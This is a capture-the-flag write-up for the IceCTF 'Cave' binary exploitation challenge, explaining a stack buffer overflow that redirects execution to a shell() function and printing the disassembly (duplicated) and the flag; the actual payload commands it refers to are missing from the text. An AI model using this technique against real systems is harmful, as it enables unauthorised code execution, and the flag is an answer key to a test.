Binary Exploitation – 2. Cave
Author: 5k33tz, valrkey
Worth: $50
Worth: $50
Description: You stumbled upon a cave! I've heard some caves hold secrets.. can you find the secrets hidden within its depths?
The start of the challenge establishes an SSH connection for you. The only directory you're presented with is a directory called "cave". CD'ing into the cave directory shows the following files:
The challenge is nice enough to leave the original source code used to compile the binary:
This appears to be a standard buffer-overflow question, but I notice that the shell function will need to be called separately.
Running the following command we can see the the shell() function is called at a static address (0x0804850b):
objdump -d ./shout | grep -A25 shell
0804850b <shell>:
804850b: 55 push %ebp
804850c: 89 e5 mov %esp,%ebp
804850e: 53 push %ebx
804850f: 83 ec 14 sub $0x14,%esp
8048512: e8 29 ff ff ff call 8048440 <__x86.get_pc_thunk.bx>
8048517: 81 c3 e9 1a 00 00 add $0x1ae9,%ebx
804851d: e8 7e fe ff ff call 80483a0 <getegid@plt>
8048522: 89 45 f4 mov %eax,-0xc(%ebp)
8048525: 83 ec 04 sub $0x4,%esp
8048528: ff 75 f4 pushl -0xc(%ebp)
804852b: ff 75 f4 pushl -0xc(%ebp)
804852e: ff 75 f4 pushl -0xc(%ebp)
8048531: e8 ba fe ff ff call 80483f0 <setresgid@plt>
8048536: 83 c4 10 add $0x10,%esp
8048539: 83 ec 0c sub $0xc,%esp
804853c: 8d 83 70 e6 ff ff lea -0x1990(%ebx),%eax
8048542: 50 push %eax
8048543: e8 88 fe ff ff call 80483d0 <system@plt>
8048548: 83 c4 10 add $0x10,%esp
804854b: 90 nop
804854c: 8b 5d fc mov -0x4(%ebp),%ebx
804854f: c9 leave
8048550: c3 ret
804850b: 55 push %ebp
804850c: 89 e5 mov %esp,%ebp
804850e: 53 push %ebx
804850f: 83 ec 14 sub $0x14,%esp
8048512: e8 29 ff ff ff call 8048440 <__x86.get_pc_thunk.bx>
8048517: 81 c3 e9 1a 00 00 add $0x1ae9,%ebx
804851d: e8 7e fe ff ff call 80483a0 <getegid@plt>
8048522: 89 45 f4 mov %eax,-0xc(%ebp)
8048525: 83 ec 04 sub $0x4,%esp
8048528: ff 75 f4 pushl -0xc(%ebp)
804852b: ff 75 f4 pushl -0xc(%ebp)
804852e: ff 75 f4 pushl -0xc(%ebp)
8048531: e8 ba fe ff ff call 80483f0 <setresgid@plt>
8048536: 83 c4 10 add $0x10,%esp
8048539: 83 ec 0c sub $0xc,%esp
804853c: 8d 83 70 e6 ff ff lea -0x1990(%ebx),%eax
8048542: 50 push %eax
8048543: e8 88 fe ff ff call 80483d0 <system@plt>
8048548: 83 c4 10 add $0x10,%esp
804854b: 90 nop
804854c: 8b 5d fc mov -0x4(%ebp),%ebx
804854f: c9 leave
8048550: c3 ret
Next we validate that overloading the buffer will result in a seg fault:
Then we can place the location of the shell() function in hex, in little-endian. Creating the overflow condition, spawning our shell, then reading the flag:
Echo-ing out the string worked out fine in this case since we were overflowing a small buffer of 16 characters. For larger overflows, you may want to use Python for more powerful string formatting such as multiplication ("A"*28 becomes a string of 28 A's):
Flag = IceCTF{i_dont_think_cavemen_overflowed_buffers}
Comments
Post a Comment